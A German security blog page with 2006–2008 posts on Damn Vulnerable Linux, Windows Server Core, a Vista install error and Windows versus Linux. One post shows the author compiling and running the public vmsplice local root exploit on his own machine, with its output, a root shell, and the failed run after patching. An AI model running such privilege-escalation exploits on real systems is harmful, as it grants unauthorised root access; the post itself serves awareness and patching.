Remoteshell-Security Blog - Operating Systems

Damn Vulnerable Linux

nospam@example.com (Daniel) — Tue, 04 Mar 2008 18:01:00 +0100

Seit Januar 2008 kann man unter damnvulnerablelinux.org die neueste Version von Damn Vulnerable Linux (Version 1.4) beziehen. Damn Vulnerable Linux (kurz DVL) ist hervorragend um seine Kenntnisse zur IT-Sicherheit zu vertiefen. Es basiert auf der Linux Distribution BackTrack2 und bietet dementsprechend alles wie man es von BackTrack2 her kennt. Darüber hinaus werden eine Vielzahl an Schulungsmaterialien zu verschiedenen Bereichen der IT-Sicherheit geboten.

DVL ist daher ideal zum Lehren von Angriffen und Gegenmaßnahmen auf IT-Systeme geeignet, so zum Beispiel für Vorlesungen an Hochschulen die sich mit der Thematik befassen. Aber auch zum Selbststudium eignet sich DVL hervorragend.

Neben den zahlreichen Schulungsmaterialien sind eine mindestens ebenso umfangreiche Anzahl an Werkzeugen vorhanden, die beim Lösen der einzelnen Challenges von Nutzen sein können.

Wer auf dem Gebiet Reverse Code Engineering Neuland betritt - wie ich auch - der wird unter dem Menüpunkt Valuable Websites Abhilfe finden. So zum Beispiel der Link zum Video Archiv von reverse-engineering.net. Nach einer Registrierung und einer anschließenden erfolgreichen Anmeldung hat man Zugriff auf das komplette Video-Archiv von video.reverse-engineering.net. Mit ein wenig Grundlagenwissen zu Assembler und anderen Programmiersprachen kann schnell der Einstieg zur Reverse Code Engineering gefunden werden. Falls dieses Wissen fehlen sollte, stellt DVL auch hier wieder entsprechende Schulungsmaterialien bereit (Menüpunkt Coding).

Jeder der seine Kenntnisse zur IT-Sicherheit spielend vertiefen möchte wird mit DVL seinen Spaß haben. Sei es nun das Lösen von Crackmes, die Challenges von HoneyNet.org, dem Ausnutzen von Schwachstellen in den Anwendungen oder einfach das Aufspüren von Lücken in Webseiten, für jeden ist was dabei, egal ob nun Novize oder Profi im Bereich IT-Sicherheit.

Root-Exploit in Kernel 2.6.17-2.6.24.1

nospam@example.com (Daniel) — Mon, 11 Feb 2008 16:26:00 +0100

Der ein oder andere wird es schon auf heise.de oder auf milw0rm.com selbst gelesen haben. Es sind zwei lokale Root-Exploits aufgetaucht, die es einem eingeschränkten Benutzer ermöglichen nach Ausführung des Exploits sich mit Root-Privilegien zu bewegen.

Die Lücke soll wohl in der aktuellen Kernel-Version (Kernel 2.6.24.2) behoben sein:

    splice: fix user pointer access in get_iovec_page_array()
    
    patch 712a30e63c8066ed84385b12edbfb804f49cbc44 in mainline.
    
    Commit 8811930dc74a503415b35c4a79d14fb0b408a361 ("splice: missing user
    pointer access verification") added the proper access_ok() calls to
    copy_from_user_mmap_sem() which ensures we can copy the struct iovecs
    from userspace to the kernel.
    
    But we also must check whether we can access the actual memory region
    pointed to by the struct iovec to fix the access checks properly.

Die Lücke beruht auf einen Fehler mit der erst in Kernel 2.6.17
eingeführten Funktion vmsplice. Mehr dazu ist dem Heise Security Eintrag zu entnehmen. Somit sind erst Kernel-Versionen größer 2.6.17 von dieser Lücke betroffen.

Wie gefährlich das Exploit ist, sieht man wenn man es selber ausprobiert hat. Es ist so einfach in der Handhabung, das es wahrscheinlich in nächster Zeit nur so von "Script-Kiddies" wimmeln wird, die sich selber profilieren wollen:

duddits@duddits ~/exploits/linux $ gcc -o expl kexp.c
kexp.c:12:22: Fehler: asm/page.h: Datei oder Verzeichnis nicht gefunden
kexp.c: In Funktion »main«:
kexp.c:193: Fehler: »PAGE_SIZE« nicht deklariert (erste Benutzung in dieser Funktion)
kexp.c:193: Fehler: (Jeder nicht deklarierte Bezeichner wird nur einmal aufgeführt
kexp.c:193: Fehler: für jede Funktion in der er auftritt.)

Beheben des Fehlers  .....
duddits@duddits ~/exploits/linux $ gcc -o expl kexp.c
duddits@duddits ~/exploits/linux $ 
duddits@duddits ~/duddits@duddits ~/exploits/linux $ ./expl 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d83000 .. 0xb7db5000
[+] root
duddits linux # id
uid=0(root) gid=0(root) Gruppen=10(wheel),18(audio),19(cdrom),85(usb),1000(duddits)
duddits linux # whoami
root

Dies hatte ich an meinem Desktop-PC ausprobiert, als ich noch Kernel-Version 2.6.22-gentoo-r5 laufen hatte. Erst nach einer Aktualisierung auf die neuste Kernel-Version funktionierte das Exploit nicht mehr:

duddits linux # echo  sys-kernel/gentoo-sources ~x86>>/etc/portage/package.keywords 
duddits linux # emerge -av sys-kernel/gentoo-sources                                    

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild  NS   ] sys-kernel/gentoo-sources-2.6.24-r2  USE="-build -symlink" 45,708 kB 

Total: 1 package (1 in new slot), Size of downloads: 45,708 kB

Would you like to merge these packages? [Yes/No] Yes
...
nach der Konfiguration und einem reboot
...
~/duddits@duddits ~/exploits/linux $ ./expl 
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d83000 .. 0xb7db5000
[-] vmsplice: Bad address

Daher sollte jeder, sofern er die Möglichkeit hat, auf die neuste Kernel-Version updaten/patchen. Falls einem diese Möglichkeit verwehrt bleibt, sollte man die Benutzer auf dem System so einschränken, das diese keine Möglichkeit zum Kompilieren haben. Weiterhin sollte auch das Laden des vorkompilierten Exploits nicht möglich sein, auch wenn das in der Praxis nur schwer zu realisieren ist.

Microsoft Server Core

nospam@example.com (Daniel) — Mon, 23 Apr 2007 21:40:00 +0200

Ein Server Betriebssystem, welches seinem Administrator nur die nötigsten Funktionen zur Verfügung stellen soll, ist für das kommende Server-Betriebssystem "Longhorn" von Microsoft zu erwarten. Der Administrator soll bei der Installation selbst entscheiden können ob er das "Rund um Glücklich"-Paket oder nur die

Server Core Variante installiert. Die Server-Core Variante beansprucht 1 GB Kapazität auf der Festplatte und soll beim Systemstart wesentlich schneller sein als seine Kollegen. Auf einen üblichen Desktop mit Explorer und Co wird hier gänzlich verzichtet. Dem Administrator steht hier nur das alt bekannte Command Line Interface von Windows zur Verfügung. Eine Unterstützung der neu entwickelten PowerShell ist derzeit noch nicht geplannt, da diese das .NET Framework voraussetzt. Dennoch werden schon Möglichkeiten nach einer minimalen Implementierung des .NET Framework untersucht [1] Microsofts Server Core soll erste Schritte in Richtung eines modularen Betriebssystems machen. So bleibt einem als Administrator nach der Installation selbst überlassen welche Dienste man nun installiert oder nicht. Das ganze nennt sich dann Rolle. Dem Server wird eine Rolle zugewiesen. Z.B. das dieser sich nur um die Namensauflösung in einem Unternehmensnetz kümmert. Die Installation, wie auch die ganze Administration des Server Core's, wird über die Konsole realisiert. Hierzu dient das Tool oclist.exe mit dem man die angebotenen Serverrollen installieren oder deinstallieren kann. Ich bin mal gespannt wie sich Longhorn und sein Server Core bis zum endgültigen Release entwickeln wird. Der Weg den Microsoft hier geht halte ich für wichtig und richtig, um unnötigen Ballast abzuwerfen. Somit können Gefährdungen des Server-Betriebes durch anfällige Dienste/Software auf eine Minimum reduziert werden. Denn eine kritische Lücke in einem Dienst die für Angreifer Tür und Tor öffnet, stellt keine Gefahr für den Server da, wenn der Dienst auf diesem erst gar nicht läuft. Eine Sache die ich noch vermisse, ist eine wirkliche privilege separation wie man diese z.B. aus OpenBSD kennt. Auch wenn das neue Windows Integrity Control

(WIC) von Vista erste Schritte in diese Richtung unternimmt, ist es noch aus Ausbau fähig.

Aber wie sagt man so schön: Nondum omnium dierum sol occidit.

Weitere Informationen zu dieser Thematik, sind in der kommenden Ausgabe der Zeitschrift IX zu entnehmen oder direkt online. Wer noch mehr wissen will, schaut am besten im Microsoft TechNet unter http://forums.microsoft.com/technet vorbei.

Fehlermeldungen Windows Vista RC1

nospam@example.com (Daniel) — Thu, 12 Oct 2006 22:37:00 +0200

Da wollte ich doch letztens die Windows Vista RC 1 auf meinem Desktop-PC installieren und war zu nächst sehr begeistert, was doch die Redmonder an der Installation geändert hatten. Selbst das Laden von Festplattentreibern war möglich, ohne umständliches F6 drücken wie in den Vorgänger-Versionen, in dem das Laden von Treibern nur von einem Diskettenlaufwerk möglich ist. Ich war echt begeistert. Doch nach einem kurzen Neustart der Installationsroutine sah ich erstmal Schwarz, erst nach einiger Zeit bekamm ich die Buntemaske zu Gesicht.Allerdings konnte ich nur eine Uhr beobachten, bei der sich der Zeiger bewegte.Nach ungefähr einer halben Stunde warten und rödeln meines DVD-Laufwerks bekamm ich eine höst interessante Fehlermeldung. Ich Zitiere:

"Windows konnte nicht installiert werden. Grund: Es ist ein Fehler bei der Installation von Windows Vista aufgetretten"

Ich muss zugeben, das ich nicht schlecht gestaunt hatte, als ich diese Meldung gelesen habe und hoffe das Microsoft dies bis zum Endgültigen Release behoben hat. Vielleicht sollte ich auch einfach mal den Release Candidat 2 ausprobieren.

Kampf der Betriebssysteme

nospam@example.com (Daniel) — Tue, 26 Sep 2006 16:55:00 +0200

Immer wieder wird in Foren,
Newsgroups oder in der Öffentlichkeit darüber diskutiert welches
Betriebssystem nun das bessere oder sichere ist. Dabei geht es
meistens darum, ob Windows nun besser ist als Linux. Häufig wird dann
damit argumentiert, das Linux sicherer ist als Windows. Der
Windows-Benutzer hingegen argumentiert damit, dass Windows ein
proprietäres System ist.
Das bedeutet, dass Windows eine feste Zugehörigkeit hat und Source Closed ist.

Schnell wird dabei aus den Augen gelassen, dass Windows nicht Linux ist und umgekehrt.
Viele die von einem der beiden Betriebssysteme umsteigen, erwarten im
Prinzip das gleiche Betriebssystem wie vorher mit einigen trivialen
Veränderungen. So ist Windows ideal für Gelegenheitsbenutzer die sich
nicht mit dem Betriebssystem auseinander setzen wollen. Weiterhin sind
viele administrative Lösungen speziell für Windows entwickelt.
Darüber hinaus werden immer noch die meisten Spiele und einige andere Anwendungen für Windows entwickelt.
Warum dann aber Linux benutzten?
Linux wird mittlerweile auch immer einfacher zu bedienen, so das es
auch in Zukunft für Gelegenheitsbenutzer interessant wird.
Der wohl größte Vorteil an Linux ist, dass es Opensource ist, und sich
ein Jeder noch intensiver mit seinem Betriebssystem auseinander setzen
kann. Aufgrund der großen Community gibt es viele Portierungen von
Windows auf Linux. So wird auch unter Linux demnächst mit Samba 4.0 das Erstellen einer Active Directory möglich sein.
Falls es mal keine Portierung bzw. vergleichbare Software gibt, wird einem mit Anwendungen wie Wine geholfen.

Wie man nun sieht, weist jedes der beiden Betriebssysteme seine Vorteile und Nachteile auf.
Die Liste könnte man ewig weiterführen und soll einem nur zeigen, dass
Windows sowie auch Linux seine Daseinsberechtigung hat.

So war eine zeitlang das erfolgreiche Tool "Netcat" nur unter
Linux/Unix verfügbar, aber schon nach ein paar Jahren übernahm jemand
die Arbeit der Portierung.

Meistens wird Argumentiert das Linux sicherer als Windows ist. Doch diese Aussage ist so nicht richtig.
Als Beispiel lässt sich gut dafür Mac-OS nehmen, bis jetzt galt es als
das sicherste Multimedia Betriebssystem, doch spätestens nach dem es
MAC-OS auch für den Intel-CPU gibt, ist das Interesse auch bei anderen
gestiegen (siehe auch heise.de)
Es liegt wohl mehr daran, wo der potenzielle Schaden größer wäre. Da
die meisten Endanwender Windows benutzen, würde ein Virus der die
Endanwender treffen soll, sinnvollerweise ein Windows-Virus anstelle
eines Linux-Virus.
Doch der größte Schwachpunkt bei einem System, ist immer noch der
Faktor Mensch und dieser ist bei jedem Betriebssystem vorhanden.
Somit lässt sich festhalten, egal welches Betriebssystem man verwendet,
ob das eigene System nun sicher ist oder nicht liegt an einem selbst.